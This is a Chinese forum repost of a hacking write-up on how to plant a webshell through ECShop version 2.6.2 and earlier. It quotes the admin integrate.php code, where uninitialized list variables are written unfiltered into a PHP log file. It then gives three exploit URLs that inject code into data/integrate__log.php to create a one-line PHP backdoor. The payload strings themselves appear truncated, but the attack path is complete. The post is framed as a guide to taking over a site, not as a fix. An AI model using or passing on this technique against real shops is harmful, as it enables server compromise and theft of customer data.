• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    ECShop网店系统<=V2.6.2 后台拿webshell

    发布者: 天下网吧 | 发布时间: 2025-6-28 23:15| 查看数: 114| 评论数: 0|帖子模式

    ECSHOP前段时间出了个注射漏洞:http://bbs.wolvez.org/topic/67/,拿后台权限应该没有问题,但文章没有提及如何在后台拿shell。昨天可乐在t00ls.Net上发帖问如何拿shell,无聊中我baidu、google了下,网上貌似没有拿shell的办法。好久没读代码了,无聊中下了ECSHOP最新版(V2.6.2)的源码过来读,很庆幸,给我找到一个可以直接写shell的文件。与注射一样,同样是个变化未初始化导致的问题,于是,同样只能用在register_globals为on的环境下。
    integrate.php第740行起:

    复制代码代码如下:
    if ($_REQUEST['act'] == 'sync')
    {
    $size = 100;
    ......
    $tasks = array();
    if ($task_del > 0)
    {
    $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'' . $_LANG['task_uncomplete'] . '');
    $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";
    $del_list = $db->getCol($sql);//$del_list未初始化
    }
    if ($task_rename > 0)
    {
    $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'' . $_LANG['task_uncomplete'] . '');
    $sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";
    $rename_list = $db->getAll($sql);//$rename_list未初始化
    }
    if ($task_ignore >0)
    {
    $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";
    $ignore_list = $db->getCol($sql);//$ignore_list未初始化
    }
    ......
    /* 保存修改日志 */
    $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');
    $log = '';
    if (isset($del_list))
    {
    $log .= '$del_list=' . var_export($del_list,true) . ';';
    }
    if (isset($rename_list))
    {
    $log .= '$rename_list=' . var_export($rename_list, true) . ';';
    }
    if (isset($ignore_list))
    {
    $log .= '$ignore_list=' . var_export($ignore_list, true) . ';';
    }
    //未做过滤,直接写log
    fwrite($fp, $log);
    fclose($fp);
    $smarty->assign('tasks', $tasks);
    $smarty->assign('ur_here',$_LANG['user_sync']);
    $smarty->assign('size', $size);
    $smarty->display('integrates_sync.htm');
    }

    $del_list、$rename_list、$ignore_list均没有初始化,于是,均可以直接写shell。
    利用方法:
    http://www.oldjun.com/admin/integrate.php?act=sync&del_list=
    http://www.oldjun.com/admin/inte ... nc&rename_list=
    http://www.oldjun.com/admin/inte ... nc&ignore_list=
    三个链接,随便输入一个就可以了,生成http://www.oldjun.com/data/integrate__log.php,就是一句话小马了~
    来源:https://www.jb51.net/hack/26334.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表